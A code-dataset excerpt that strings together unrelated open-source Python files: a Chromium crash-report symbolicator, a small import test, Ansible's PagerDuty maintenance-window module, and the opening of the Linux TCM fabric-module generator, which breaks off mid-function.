# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with cloudprint. If not, see <http://www.gnu.org/licenses/>.
|
mkaluza/external_chromium_org
|
refs/heads/kk44
|
tools/mac/symbolicate_crash.py
|
178
|
#!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
This script can take an Apple-style CrashReporter log and symbolicate it. This
is useful for when a user's reports aren't being uploaded, for example.
Only versions 6, 7, 8, and 9 reports are supported. For more information on the
file format, reference this document:
TN2123 <http://developer.apple.com/library/mac/#technotes/tn2004/tn2123.html>
Information on symbolication was gleaned from:
<http://developer.apple.com/tools/xcode/symbolizingcrashdumps.html>
"""
import optparse
import os.path
import re
import subprocess
import sys
# Maps binary image identifiers to binary names (minus the .dSYM portion) found
# in the archive. These are the only objects that will be looked up.
SYMBOL_IMAGE_MAP = {
'com.google.Chrome': 'Google Chrome.app',
'com.google.Chrome.framework': 'Google Chrome Framework.framework',
'com.google.Chrome.helper': 'Google Chrome Helper.app'
}
class CrashReport(object):
"""A parsed representation of an Apple CrashReport text file."""
def __init__(self, file_name):
super(CrashReport, self).__init__()
self.report_info = {}
self.threads = []
self._binary_images = {}
fd = open(file_name, 'r')
self._ParseHeader(fd)
# Try and get the report version. If it's not a version we handle, abort.
self.report_version = int(self.report_info['Report Version'])
# Version 6: 10.5 and 10.6 crash report
# Version 7: 10.6 spindump report
# Version 8: 10.7 spindump report
# Version 9: 10.7 crash report
valid_versions = (6, 7, 8, 9)
if self.report_version not in valid_versions:
raise Exception("Only crash reports of versions %s are accepted." %
str(valid_versions))
# If this is a spindump (version 7 or 8 report), use a special parser. The
# format is undocumented, but is similar to version 6. However, the spindump
# report contains user and kernel stacks for every process on the system.
if self.report_version == 7 or self.report_version == 8:
self._ParseSpindumpStack(fd)
else:
self._ParseStack(fd)
self._ParseBinaryImages(fd)
fd.close()
def Symbolicate(self, symbol_path):
"""Symbolicates a crash report stack trace."""
# In order to be efficient, collect all the offsets that will be passed to
# atos by the image name.
offsets_by_image = self._CollectAddressesForImages(SYMBOL_IMAGE_MAP.keys())
# For each image, run atos with the list of addresses.
for image_name, addresses in offsets_by_image.items():
# If this image was not loaded or is in no stacks, skip.
if image_name not in self._binary_images or not len(addresses):
continue
# Combine the |image_name| and |symbol_path| into the path of the dSYM.
dsym_file = self._GetDSymPath(symbol_path, image_name)
# From the list of 2-Tuples of (frame, address), create a list of just
# addresses.
address_list = map(lambda x: x[1], addresses)
# Look up the load address of the image.
binary_base = self._binary_images[image_name][0]
# This returns a list of just symbols. The indices will match up with the
# list of |addresses|.
symbol_names = self._RunAtos(binary_base, dsym_file, address_list)
if not symbol_names:
print 'Error loading symbols for ' + image_name
continue
# Attaches a list of symbol names to stack frames. This assumes that the
# order of |addresses| has stayed the same as |symbol_names|.
self._AddSymbolsToFrames(symbol_names, addresses)
def _ParseHeader(self, fd):
"""Parses the header section of a crash report, which contains the OS and
application version information."""
# The header is made up of different sections, depending on the type of
# report and the report version. Almost all have a format of a key and
# value separated by a colon. Accumulate all of these artifacts into a
# dictionary until the first thread stack is reached.
thread_re = re.compile('^[ \t]*Thread ([a-f0-9]+)')
line = ''
while not thread_re.match(line):
# Skip blank lines. There are typically three or four sections separated
# by newlines in the header.
line = line.strip()
if line:
parts = line.split(':', 1)
# Certain lines in different report versions don't follow the key-value
# format, so skip them.
if len(parts) == 2:
# There's a varying amount of space padding after the ':' to align all
# the values; strip that.
self.report_info[parts[0]] = parts[1].lstrip()
line = fd.readline()
# When this loop exits, the header has been read in full. However, the first
# thread stack heading has been read past. Seek backwards from the current
# position by the length of the line so that it is re-read when
# _ParseStack() is entered.
fd.seek(-len(line), os.SEEK_CUR)
def _ParseStack(self, fd):
"""Parses the stack dump of a crash report and creates a list of threads
and their stack traces."""
# Compile a regex that matches the start of a thread stack. Note that this
# must be specific to not include the thread state section, which comes
# right after all the stack traces.
line_re = re.compile('^Thread ([0-9]+)( Crashed)?:(.*)')
# On entry into this function, the fd has been walked up to the "Thread 0"
# line.
line = fd.readline().rstrip()
in_stack = False
thread = None
while line_re.match(line) or in_stack:
# Check for start of the thread stack.
matches = line_re.match(line)
if not line.strip():
# A blank line indicates a break in the thread stack.
in_stack = False
elif matches:
# If this is the start of a thread stack, create the CrashThread.
in_stack = True
thread = CrashThread(matches.group(1))
thread.name = matches.group(3)
thread.did_crash = matches.group(2) != None
self.threads.append(thread)
else:
# All other lines are stack frames.
thread.stack.append(self._ParseStackFrame(line))
# Read the next line.
line = fd.readline()
def _ParseStackFrame(self, line):
"""Takes in a single line of text and transforms it into a StackFrame."""
frame = StackFrame(line)
# A stack frame is in the format of:
# |<frame-number> <binary-image> 0x<address> <symbol> <offset>|.
regex = '^([0-9]+) +(.+)[ \t]+(0x[0-9a-f]+) (.*) \+ ([0-9]+)$'
matches = re.match(regex, line)
if matches is None:
return frame
# Create a stack frame with the information extracted from the regex.
frame.frame_id = matches.group(1)
frame.image = matches.group(2)
frame.address = int(matches.group(3), 0) # Convert HEX to an int.
frame.original_symbol = matches.group(4)
frame.offset = matches.group(5)
frame.line = None
return frame
def _ParseSpindumpStack(self, fd):
"""Parses a spindump stack report. In this format, each thread stack has
both a user and kernel trace. Only the user traces are symbolicated."""
# The stack trace begins with the thread header, which is identified by a
# HEX number. The thread names appear to be incorrect in spindumps.
user_thread_re = re.compile('^ Thread ([0-9a-fx]+)')
# When this method is called, the fd has been walked right up to the first
# line.
line = fd.readline()
in_user_stack = False
in_kernel_stack = False
thread = None
frame_id = 0
while user_thread_re.match(line) or in_user_stack or in_kernel_stack:
# Check for the start of a thread.
matches = user_thread_re.match(line)
if not line.strip():
# A blank line indicates the start of a new thread. The blank line comes
# after the kernel stack before a new thread header.
in_kernel_stack = False
elif matches:
# This is the start of a thread header. The next line is the heading for
# the user stack, followed by the actual trace.
thread = CrashThread(matches.group(1))
frame_id = 0
self.threads.append(thread)
in_user_stack = True
line = fd.readline() # Read past the 'User stack:' header.
elif line.startswith(' Kernel stack:'):
# The kernel stack header comes immediately after the last frame (really
# the top frame) in the user stack, without a blank line.
in_user_stack = False
in_kernel_stack = True
elif in_user_stack:
# If this is a line while in the user stack, parse it as a stack frame.
thread.stack.append(self._ParseSpindumpStackFrame(line))
# Loop with the next line.
line = fd.readline()
# When the loop exits, the file has been read through the 'Binary images:'
# header. Seek backwards so that _ParseBinaryImages() does the right thing.
fd.seek(-len(line), os.SEEK_CUR)
def _ParseSpindumpStackFrame(self, line):
"""Parses a spindump-style stackframe."""
frame = StackFrame(line)
# The format of the frame is either:
# A: |<space><steps> <symbol> + <offset> (in <image-name>) [<address>]|
# B: |<space><steps> ??? (in <image-name> + <offset>) [<address>]|
regex_a = '^([ ]+[0-9]+) (.*) \+ ([0-9]+) \(in (.*)\) \[(0x[0-9a-f]+)\]'
regex_b = '^([ ]+[0-9]+) \?\?\?( \(in (.*) \+ ([0-9]+)\))? \[(0x[0-9a-f]+)\]'
# Create the stack frame with the information extracted from the regex.
matches = re.match(regex_a, line)
if matches:
frame.frame_id = matches.group(1)[4:] # Remove some leading spaces.
frame.original_symbol = matches.group(2)
frame.offset = matches.group(3)
frame.image = matches.group(4)
frame.address = int(matches.group(5), 0)
frame.line = None
return frame
# If pattern A didn't match (which it will most of the time), try B.
matches = re.match(regex_b, line)
if matches:
frame.frame_id = matches.group(1)[4:] # Remove some leading spaces.
frame.image = matches.group(3)
frame.offset = matches.group(4)
frame.address = int(matches.group(5), 0)
frame.line = None
return frame
# Otherwise, this frame could not be matched and just use the raw input.
frame.line = frame.line.strip()
return frame
def _ParseBinaryImages(self, fd):
"""Parses out the binary images section in order to get the load offset."""
# The parser skips some sections, so advance until the "Binary Images"
# header is reached.
while not fd.readline().lstrip().startswith("Binary Images:"): pass
# Create a regex to match the lines of format:
# |0x<start> - 0x<end> <binary-image> <version> (<version>) <<UUID>> <path>|
image_re = re.compile(
'[ ]*(0x[0-9a-f]+) -[ \t]+(0x[0-9a-f]+) [+ ]([a-zA-Z0-9._\-]+)')
# This section is in this format:
# |<start address> - <end address> <image name>|.
while True:
line = fd.readline()
if not line.strip():
# End when a blank line is hit.
return
# Match the line to the regex.
match = image_re.match(line)
if match:
# Store the offsets by image name so it can be referenced during
# symbolication. These are hex numbers with leading '0x', so int() can
# convert them to decimal if base=0.
address_range = (int(match.group(1), 0), int(match.group(2), 0))
self._binary_images[match.group(3)] = address_range
def _CollectAddressesForImages(self, images):
"""Iterates all the threads and stack frames and all the stack frames that
are in a list of binary |images|. The result is a dictionary, keyed by the
image name that maps to a list of tuples. Each is a 2-Tuple of
(stack_frame, address)"""
# Create the collection and initialize it with empty lists for each image.
collection = {}
for image in images:
collection[image] = []
# Perform the iteration.
for thread in self.threads:
for frame in thread.stack:
image_name = self._ImageForAddress(frame.address)
if image_name in images:
# Replace the image name in the frame in case it was elided.
frame.image = image_name
collection[frame.image].append((frame, frame.address))
# Return the result.
return collection
def _ImageForAddress(self, address):
"""Given a PC address, returns the bundle identifier of the image in which
the address resides."""
for image_name, address_range in self._binary_images.items():
if address >= address_range[0] and address <= address_range[1]:
return image_name
return None
def _GetDSymPath(self, base_path, image_name):
"""Takes a base path for the symbols and an image name. It looks the name up
in SYMBOL_IMAGE_MAP and creates a full path to the dSYM in the bundle."""
image_file = SYMBOL_IMAGE_MAP[image_name]
return os.path.join(base_path, image_file + '.dSYM', 'Contents',
'Resources', 'DWARF',
os.path.splitext(image_file)[0]) # Chop off the extension.
def _RunAtos(self, load_address, dsym_file, addresses):
"""Runs the atos with the provided arguments. |addresses| is used as stdin.
Returns a list of symbol information in the same order as |addresses|."""
args = ['atos', '-l', str(load_address), '-o', dsym_file]
# Get the arch type. This is of the format |X86 (Native)|.
if 'Code Type' in self.report_info:
arch = self.report_info['Code Type'].lower().split(' ')
if len(arch) == 2:
arch = arch[0]
if arch == 'x86':
# The crash report refers to i386 as x86, but atos doesn't know what
# that is.
arch = 'i386'
args.extend(['-arch', arch])
proc = subprocess.Popen(args, stdin=subprocess.PIPE, stdout=subprocess.PIPE)
addresses = map(hex, addresses)
(stdout, stderr) = proc.communicate(' '.join(addresses))
if proc.returncode:
return None
return stdout.rstrip().split('\n')
def _AddSymbolsToFrames(self, symbols, address_tuples):
"""Takes a single value (the list) from _CollectAddressesForImages and does
a smart-zip with the data returned by atos in |symbols|. Note that the
indices must match for this to succeed."""
if len(symbols) != len(address_tuples):
print 'symbols do not match'
# Each line of output from atos is in this format:
# |<symbol> (in <image>) (<file>:<line>)|.
line_regex = re.compile('(.+) \(in (.+)\) (\((.+):([0-9]+)\))?')
# Zip the two data sets together.
for i in range(len(symbols)):
symbol_parts = line_regex.match(symbols[i])
if not symbol_parts:
continue # Error.
frame = address_tuples[i][0]
frame.symbol = symbol_parts.group(1)
frame.image = symbol_parts.group(2)
frame.file_name = symbol_parts.group(4)
frame.line_number = symbol_parts.group(5)
class CrashThread(object):
"""A CrashThread represents a stacktrace of a single thread """
def __init__(self, thread_id):
super(CrashThread, self).__init__()
self.thread_id = thread_id
self.name = None
self.did_crash = False
self.stack = []
def __repr__(self):
name = ''
if self.name:
name = ': ' + self.name
return 'Thread ' + self.thread_id + name + '\n' + \
'\n'.join(map(str, self.stack))
class StackFrame(object):
"""A StackFrame is owned by a CrashThread."""
def __init__(self, line):
super(StackFrame, self).__init__()
# The original line. This will be set to None if symbolication was
# successfuly.
self.line = line
self.frame_id = 0
self.image = None
self.address = 0x0
self.original_symbol = None
self.offset = 0x0
# The following members are set after symbolication.
self.symbol = None
self.file_name = None
self.line_number = 0
def __repr__(self):
# If symbolication failed, just use the original line.
if self.line:
return ' %s' % self.line
# Use different location information depending on symbolicated data.
location = None
if self.file_name:
location = ' - %s:%s' % (self.file_name, self.line_number)
else:
location = ' + %s' % self.offset
# Same with the symbol information.
symbol = self.original_symbol
if self.symbol:
symbol = self.symbol
return ' %s\t0x%x\t[%s\t%s]\t%s' % (self.frame_id, self.address,
self.image, location, symbol)
def PrettyPrintReport(report):
"""Takes a crash report and prints it like the crash server would."""
print 'Process : ' + report.report_info['Process']
print 'Version : ' + report.report_info['Version']
print 'Date : ' + report.report_info['Date/Time']
print 'OS Version : ' + report.report_info['OS Version']
print
if 'Crashed Thread' in report.report_info:
print 'Crashed Thread : ' + report.report_info['Crashed Thread']
print
if 'Event' in report.report_info:
print 'Event : ' + report.report_info['Event']
print
for thread in report.threads:
print
if thread.did_crash:
exc_type = report.report_info['Exception Type'].split(' ')[0]
exc_code = report.report_info['Exception Codes'].replace('at', '@')
print '*CRASHED* ( ' + exc_type + ' / ' + exc_code + ' )'
# Version 7 reports have spindump-style output (with a stepped stack trace),
# so remove the first tab to get better alignment.
if report.report_version == 7:
for line in repr(thread).split('\n'):
print line.replace('\t', ' ', 1)
else:
print thread
def Main(args):
"""Program main."""
parser = optparse.OptionParser(
usage='%prog [options] symbol_path crash_report',
description='This will parse and symbolicate an Apple CrashReporter v6-9 '
'file.')
parser.add_option('-s', '--std-path', action='store_true', dest='std_path',
help='With this flag, the symbol_path is a containing '
'directory, in which a dSYM files are stored in a '
'directory named by the version. Example: '
'[symbolicate_crash.py -s ./symbols/ report.crash] will '
'look for dSYMs in ./symbols/15.0.666.0/ if the report is '
'from that verison.')
(options, args) = parser.parse_args(args[1:])
# Check that we have something to symbolicate.
if len(args) != 2:
parser.print_usage()
return 1
report = CrashReport(args[1])
symbol_path = None
# If not using the standard layout, this is a full path to the symbols.
if not options.std_path:
symbol_path = args[0]
# Otherwise, use the report version to locate symbols in a directory.
else:
# This is in the format of |M.N.B.P (B.P)|. Get just the part before the
# space.
chrome_version = report.report_info['Version'].split(' ')[0]
symbol_path = os.path.join(args[0], chrome_version)
# Check that the symbols exist.
if not os.path.isdir(symbol_path):
print >>sys.stderr, 'Symbol path %s is not a directory' % symbol_path
return 2
print >>sys.stderr, 'Using symbols from ' + symbol_path
print >>sys.stderr, '=' * 80
report.Symbolicate(symbol_path)
PrettyPrintReport(report)
return 0
if __name__ == '__main__':
sys.exit(Main(sys.argv))
|
megan-guidry/dssr2017ABI-mgui210
|
refs/heads/master
|
modelVersions/testConnection.py
|
1
|
import sys
import os
sys.path.append(os.path.abspath("../"))
import InterfaceTest
print("IMPORT SUCCESS!")
#dataFile = InterfaceTest.dataFile
#print("Testoutput " + dataFile)
|
jhawkesworth/ansible
|
refs/heads/devel
|
lib/ansible/modules/monitoring/pagerduty.py
|
52
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright: Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
module: pagerduty
short_description: Create PagerDuty maintenance windows
description:
- This module will let you create PagerDuty maintenance windows
version_added: "1.2"
author:
- "Andrew Newdigate (@suprememoocow)"
- "Dylan Silva (@thaumos)"
- "Justin Johns (!UNKNOWN)"
- "Bruce Pennypacker (@bpennypacker)"
requirements:
- PagerDuty API access
options:
state:
description:
- Create a maintenance window or get a list of ongoing windows.
required: true
choices: [ "running", "started", "ongoing", "absent" ]
name:
description:
- PagerDuty unique subdomain. Obsolete. It is not used with PagerDuty REST v2 API.
user:
description:
- PagerDuty user ID. Obsolete. Please, use I(token) for authorization.
token:
description:
- A pagerduty token, generated on the pagerduty site. It is used for authorization.
required: true
version_added: '1.8'
requester_id:
description:
- ID of user making the request. Only needed when creating a maintenance_window.
version_added: '1.8'
service:
description:
- A comma separated list of PagerDuty service IDs.
aliases: [ services ]
window_id:
description:
- ID of maintenance window. Only needed when absent a maintenance_window.
version_added: "2.7"
hours:
description:
- Length of maintenance window in hours.
default: 1
minutes:
description:
- Maintenance window in minutes (this is added to the hours).
default: 0
version_added: '1.8'
desc:
description:
- Short description of maintenance window.
default: Created by Ansible
validate_certs:
description:
- If C(no), SSL certificates will not be validated. This should only be used
on personally controlled sites using self-signed certificates.
type: bool
default: 'yes'
version_added: 1.5.1
'''
EXAMPLES = '''
# List ongoing maintenance windows using a token
- pagerduty:
name: companyabc
token: xxxxxxxxxxxxxx
state: ongoing
# Create a 1 hour maintenance window for service FOO123
- pagerduty:
name: companyabc
user: example@example.com
token: yourtoken
state: running
service: FOO123
# Create a 5 minute maintenance window for service FOO123
- pagerduty:
name: companyabc
token: xxxxxxxxxxxxxx
hours: 0
minutes: 5
state: running
service: FOO123
# Create a 4 hour maintenance window for service FOO123 with the description "deployment".
- pagerduty:
name: companyabc
user: example@example.com
state: running
service: FOO123
hours: 4
desc: deployment
register: pd_window
# Delete the previous maintenance window
- pagerduty:
name: companyabc
user: example@example.com
state: absent
window_id: '{{ pd_window.result.maintenance_window.id }}'
# Delete a maintenance window from a separate playbook than its creation, and if it is the only existing maintenance window.
- pagerduty:
requester_id: XXXXXXX
token: yourtoken
state: ongoing
register: pd_window
- pagerduty:
requester_id: XXXXXXX
token: yourtoken
state: absent
window_id: "{{ pd_window.result.maintenance_windows[0].id }}"
'''
import datetime
import json
import base64
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.urls import fetch_url
from ansible.module_utils._text import to_bytes
class PagerDutyRequest(object):
def __init__(self, module, name, user, token):
self.module = module
self.name = name
self.user = user
self.token = token
self.headers = {
'Content-Type': 'application/json',
"Authorization": self._auth_header(),
'Accept': 'application/vnd.pagerduty+json;version=2'
}
def ongoing(self, http_call=fetch_url):
url = "https://api.pagerduty.com/maintenance_windows?filter=ongoing"
headers = dict(self.headers)
response, info = http_call(self.module, url, headers=headers)
if info['status'] != 200:
self.module.fail_json(msg="failed to lookup the ongoing window: %s" % info['msg'])
json_out = self._read_response(response)
return False, json_out, False
def create(self, requester_id, service, hours, minutes, desc, http_call=fetch_url):
if not requester_id:
self.module.fail_json(msg="requester_id is required when maintenance window should be created")
url = 'https://api.pagerduty.com/maintenance_windows'
headers = dict(self.headers)
headers.update({'From': requester_id})
start, end = self._compute_start_end_time(hours, minutes)
services = self._create_services_payload(service)
request_data = {'maintenance_window': {'start_time': start, 'end_time': end, 'description': desc, 'services': services}}
data = json.dumps(request_data)
response, info = http_call(self.module, url, data=data, headers=headers, method='POST')
if info['status'] != 201:
self.module.fail_json(msg="failed to create the window: %s" % info['msg'])
json_out = self._read_response(response)
return False, json_out, True
def _create_services_payload(self, service):
if (isinstance(service, list)):
return [{'id': s, 'type': 'service_reference'} for s in service]
else:
return [{'id': service, 'type': 'service_reference'}]
def _compute_start_end_time(self, hours, minutes):
now = datetime.datetime.utcnow()
later = now + datetime.timedelta(hours=int(hours), minutes=int(minutes))
start = now.strftime("%Y-%m-%dT%H:%M:%SZ")
end = later.strftime("%Y-%m-%dT%H:%M:%SZ")
return start, end
def absent(self, window_id, http_call=fetch_url):
url = "https://api.pagerduty.com/maintenance_windows/" + window_id
headers = dict(self.headers)
response, info = http_call(self.module, url, headers=headers, method='DELETE')
if info['status'] != 204:
self.module.fail_json(msg="failed to delete the window: %s" % info['msg'])
json_out = self._read_response(response)
return False, json_out, True
def _auth_header(self):
return "Token token=%s" % self.token
def _read_response(self, response):
try:
return json.loads(response.read())
except Exception:
return ""
def main():
module = AnsibleModule(
argument_spec=dict(
state=dict(required=True, choices=['running', 'started', 'ongoing', 'absent']),
name=dict(required=False),
user=dict(required=False),
token=dict(required=True, no_log=True),
service=dict(required=False, type='list', aliases=["services"]),
window_id=dict(required=False),
requester_id=dict(required=False),
hours=dict(default='1', required=False),
minutes=dict(default='0', required=False),
desc=dict(default='Created by Ansible', required=False),
validate_certs=dict(default='yes', type='bool'),
)
)
state = module.params['state']
name = module.params['name']
user = module.params['user']
service = module.params['service']
window_id = module.params['window_id']
hours = module.params['hours']
minutes = module.params['minutes']
token = module.params['token']
desc = module.params['desc']
requester_id = module.params['requester_id']
pd = PagerDutyRequest(module, name, user, token)
if state == "running" or state == "started":
if not service:
module.fail_json(msg="service not specified")
(rc, out, changed) = pd.create(requester_id, service, hours, minutes, desc)
if rc == 0:
changed = True
if state == "ongoing":
(rc, out, changed) = pd.ongoing()
if state == "absent":
(rc, out, changed) = pd.absent(window_id)
if rc != 0:
module.fail_json(msg="failed", result=out)
module.exit_json(msg="success", result=out, changed=changed)
if __name__ == '__main__':
main()
|
bhadram/linux
|
refs/heads/master
|
Documentation/target/tcm_mod_builder.py
|
337
|
#!/usr/bin/python
# The TCM v4 multi-protocol fabric module generation script for drivers/target/$NEW_MOD
#
# Copyright (c) 2010 Rising Tide Systems
# Copyright (c) 2010 Linux-iSCSI.org
#
# Author: nab@kernel.org
#
import os, sys
import subprocess as sub
import string
import re
import optparse
tcm_dir = ""
fabric_ops = []
fabric_mod_dir = ""
fabric_mod_port = ""
fabric_mod_init_port = ""
def tcm_mod_err(msg):
print msg
sys.exit(1)
def tcm_mod_create_module_subdir(fabric_mod_dir_var):
if os.path.isdir(fabric_mod_dir_var) == True:
return 1
print "Creating fabric_mod_dir: " + fabric_mod_dir_var
ret = os.mkdir(fabric_mod_dir_var)
if ret:
tcm_mod_err("Unable to mkdir " + fabric_mod_dir_var)
return
def tcm_mod_build_FC_include(fabric_mod_dir_var, fabric_mod_name):
global fabric_mod_port
global fabric_mod_init_port
buf = ""
f = fabric_mod_dir_var + "/" + fabric_mod_name + "_base.h"
print "Writing file: " + f
p = open(f, 'w');
if not p:
tcm_mod_err("Unable to open file: " + f)
buf = "#define " + fabric_mod_name.upper() + "_VERSION \"v0.1\"\n"
buf += "#define " + fabric_mod_name.upper() + "_NAMELEN 32\n"
buf += "\n"
buf += "struct " + fabric_mod_name + "_tpg {\n"
buf += " /* FC lport target portal group tag for TCM */\n"
buf += " u16 lport_tpgt;\n"
buf += " /* Pointer back to " + fabric_mod_name + "_lport */\n"
buf += " struct " + fabric_mod_name + "_lport *lport;\n"
buf += " /* Returned by " + fabric_mod_name + "_make_tpg() */\n"
buf += " struct se_portal_group se_tpg;\n"
buf += "};\n"
buf += "\n"
buf += "struct " + fabric_mod_name + "_lport {\n"
buf += " /* Binary World Wide unique Port Name for FC Target Lport */\n"
buf += " u64 lport_wwpn;\n"
buf += " /* ASCII formatted WWPN for FC Target Lport */\n"
buf += " char lport_name[" + fabric_mod_name.upper() + "_NAMELEN];\n"
buf += " /* Returned by " + fabric_mod_name + "_make_lport() */\n"
buf += " struct se_wwn lport_wwn;\n"
buf += "};\n"
ret = p.write(buf)
if ret:
tcm_mod_err("Unable to write f: " + f)
p.close()
fabric_mod_port = "lport"
fabric_mod_init_port = "nport"
return
def tcm_mod_build_SAS_include(fabric_mod_dir_var, fabric_mod_name):
global fabric_mod_port
global fabric_mod_init_port
buf = ""
f = fabric_mod_dir_var + "/" + fabric_mod_name + "_base.h"
print "Writing file: " + f
p = open(f, 'w');
if not p:
tcm_mod_err("Unable to open file: " + f)
buf = "#define " + fabric_mod_name.upper() + "_VERSION \"v0.1\"\n"
buf += "#define " + fabric_mod_name.upper() + "_NAMELEN 32\n"
buf += "\n"
buf += "struct " + fabric_mod_name + "_tpg {\n"
buf += " /* SAS port target portal group tag for TCM */\n"
buf += " u16 tport_tpgt;\n"
buf += " /* Pointer back to " + fabric_mod_name + "_tport */\n"
buf += " struct " + fabric_mod_name + "_tport *tport;\n"
buf += " /* Returned by " + fabric_mod_name + "_make_tpg() */\n"
buf += " struct se_portal_group se_tpg;\n"
buf += "};\n\n"
buf += "struct " + fabric_mod_name + "_tport {\n"
buf += " /* Binary World Wide unique Port Name for SAS Target port */\n"
buf += " u64 tport_wwpn;\n"
buf += " /* ASCII formatted WWPN for SAS Target port */\n"
buf += " char tport_name[" + fabric_mod_name.upper() + "_NAMELEN];\n"
buf += " /* Returned by " + fabric_mod_name + "_make_tport() */\n"
buf += " struct se_wwn tport_wwn;\n"
buf += "};\n"
ret = p.write(buf)
if ret:
tcm_mod_err("Unable to write f: " + f)
p.close()
fabric_mod_port = "tport"
fabric_mod_init_port = "iport"
return
def tcm_mod_build_iSCSI_include(fabric_mod_dir_var, fabric_mod_name):
global fabric_mod_port
global fabric_mod_init_port
buf = ""
f = fabric_mod_dir_var + "/" + fabric_mod_name + "_base.h"
print "Writing file: " + f
p = open(f, 'w');
if not p:
tcm_mod_err("Unable to open file: " + f)
buf = "#define " + fabric_mod_name.upper() + "_VERSION \"v0.1\"\n"
buf += "#define " + fabric_mod_name.upper() + "_NAMELEN 32\n"
buf += "\n"
buf += "struct " + fabric_mod_name + "_tpg {\n"
buf += " /* iSCSI target portal group tag for TCM */\n"
buf += " u16 tport_tpgt;\n"
buf += " /* Pointer back to " + fabric_mod_name + "_tport */\n"
buf += " struct " + fabric_mod_name + "_tport *tport;\n"
buf += " /* Returned by " + fabric_mod_name + "_make_tpg() */\n"
buf += " struct se_portal_group se_tpg;\n"
buf += "};\n\n"
buf += "struct " + fabric_mod_name + "_tport {\n"
buf += " /* ASCII formatted TargetName for IQN */\n"
buf += " char tport_name[" + fabric_mod_name.upper() + "_NAMELEN];\n"
buf += " /* Returned by " + fabric_mod_name + "_make_tport() */\n"
buf += " struct se_wwn tport_wwn;\n"
buf += "};\n"
ret = p.write(buf)
if ret:
tcm_mod_err("Unable to write f: " + f)
p.close()
fabric_mod_port = "tport"
fabric_mod_init_port = "iport"
return
def tcm_mod_build_base_includes(proto_ident, fabric_mod_dir_val, fabric_mod_name):
if proto_ident == "FC":
tcm_mod_build_FC_include(fabric_mod_dir_val, fabric_mod_name)
elif proto_ident == "SAS":
tcm_mod_build_SAS_include(fabric_mod_dir_val, fabric_mod_name)
elif proto_ident == "iSCSI":
tcm_mod_build_iSCSI_include(fabric_mod_dir_val, fabric_mod_name)
else:
print "Unsupported proto_ident: " + proto_ident
sys.exit(1)
return
def tcm_mod_build_configfs(proto_ident, fabric_mod_dir_var, fabric_mod_name):
buf = ""
f = fabric_mod_dir_var + "/" + fabric_mod_name + "_configfs.c"
print "Writing file: " + f
p = open(f, 'w');
if not p:
tcm_mod_err("Unable to open file: " + f)
buf = "#include <linux/module.h>\n"
buf += "#include <linux/moduleparam.h>\n"
buf += "#include <linux/version.h>\n"
buf += "#include <generated/utsrelease.h>\n"
buf += "#include <linux/utsname.h>\n"
buf += "#include <linux/init.h>\n"
buf += "#include <linux/slab.h>\n"
buf += "#include <linux/kthread.h>\n"
buf += "#include <linux/types.h>\n"
buf += "#include <linux/string.h>\n"
buf += "#include <linux/configfs.h>\n"
buf += "#include <linux/ctype.h>\n"
buf += "#include <asm/unaligned.h>\n"
buf += "#include <scsi/scsi_proto.h>\n\n"
buf += "#include <target/target_core_base.h>\n"
buf += "#include <target/target_core_fabric.h>\n"
buf += "#include <target/target_core_fabric_configfs.h>\n"
buf += "#include <target/configfs_macros.h>\n\n"
buf += "#include \"" + fabric_mod_name + "_base.h\"\n"
buf += "#include \"" + fabric_mod_name + "_fabric.h\"\n\n"
buf += "static const struct target_core_fabric_ops " + fabric_mod_name + "_ops;\n\n"
buf += "static struct se_portal_group *" + fabric_mod_name + "_make_tpg(\n"
buf += " struct se_wwn *wwn,\n"
buf += " struct config_group *group,\n"
buf += " const char *name)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + "*" + fabric_mod_port + " = container_of(wwn,\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + ", " + fabric_mod_port + "_wwn);\n\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg;\n"
buf += " unsigned long tpgt;\n"
buf += " int ret;\n\n"
buf += " if (strstr(name, \"tpgt_\") != name)\n"
buf += " return ERR_PTR(-EINVAL);\n"
buf += " if (kstrtoul(name + 5, 10, &tpgt) || tpgt > UINT_MAX)\n"
buf += " return ERR_PTR(-EINVAL);\n\n"
buf += " tpg = kzalloc(sizeof(struct " + fabric_mod_name + "_tpg), GFP_KERNEL);\n"
buf += " if (!tpg) {\n"
buf += " printk(KERN_ERR \"Unable to allocate struct " + fabric_mod_name + "_tpg\");\n"
buf += " return ERR_PTR(-ENOMEM);\n"
buf += " }\n"
buf += " tpg->" + fabric_mod_port + " = " + fabric_mod_port + ";\n"
buf += " tpg->" + fabric_mod_port + "_tpgt = tpgt;\n\n"
if proto_ident == "FC":
buf += " ret = core_tpg_register(wwn, &tpg->se_tpg, SCSI_PROTOCOL_FCP);\n"
elif proto_ident == "SAS":
buf += " ret = core_tpg_register(wwn, &tpg->se_tpg, SCSI_PROTOCOL_SAS);\n"
elif proto_ident == "iSCSI":
buf += " ret = core_tpg_register(wwn, &tpg->se_tpg, SCSI_PROTOCOL_ISCSI);\n"
buf += " if (ret < 0) {\n"
buf += " kfree(tpg);\n"
buf += " return NULL;\n"
buf += " }\n"
buf += " return &tpg->se_tpg;\n"
buf += "}\n\n"
buf += "static void " + fabric_mod_name + "_drop_tpg(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n\n"
buf += " core_tpg_deregister(se_tpg);\n"
buf += " kfree(tpg);\n"
buf += "}\n\n"
buf += "static struct se_wwn *" + fabric_mod_name + "_make_" + fabric_mod_port + "(\n"
buf += " struct target_fabric_configfs *tf,\n"
buf += " struct config_group *group,\n"
buf += " const char *name)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + ";\n"
if proto_ident == "FC" or proto_ident == "SAS":
buf += " u64 wwpn = 0;\n\n"
buf += " /* if (" + fabric_mod_name + "_parse_wwn(name, &wwpn, 1) < 0)\n"
